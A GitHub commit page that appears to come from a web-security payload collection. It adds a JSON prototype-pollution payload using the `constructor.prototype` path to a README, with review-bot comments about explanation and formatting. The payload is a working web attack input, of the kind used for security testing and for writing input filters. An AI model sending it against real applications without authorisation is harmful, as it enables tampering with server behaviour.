Merge pull request swisskyrepo#703 from Aftab700/JSON-Prototype-Pollution

Adding the payload for polluting the prototype via the `constructor` property in JSON input
swisskyrepo authored Jan 5, 2024
2 parents f96c1e4 + 08063f0 commit c6f96f7
Showing 1 changed file with 14 additions and 1 deletion.
15 changes: 14 additions & 1 deletion Prototype Pollution/README.md
Expand Up @@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
}
```

Polluting the prototype via the `constructor` property instead.

```js
{
"constructor": {
"prototype": {
"foo": "bar",
"json spaces": 10
}
}
}
```


### Prototype Pollution in URL

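Review bot: The new sentence "Polluting the prototype via the `constructor` property instead." does not say what this variant is an alternative to or when a reader would need it, and the payload's two keys, `"foo": "bar"` and `"json spaces": 10`, are left unexplained. Add a sentence naming the payload this one replaces and what each key is expected to change, so the entry is usable both for testing and for writing input filters that also cover the `constructor` and `prototype` keys. Two smaller points: the fence is tagged `js` although the body is a JSON document, and the added trailing blank line leaves two blank lines before `### Prototype Pollution in URL`.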
Expand Down Expand Up @@ -176,4 +189,4 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder
* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4)
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
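Review bot: The final reference line, the Gareth Heyes keynote link, is removed and re-added with identical visible text, which points to a whitespace or end-of-file newline change unrelated to the `constructor` payload. Confirm the change is intentional (for example, adding the missing trailing newline) and mention it in the commit message, or drop it so the diff stays limited to the payload addition.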
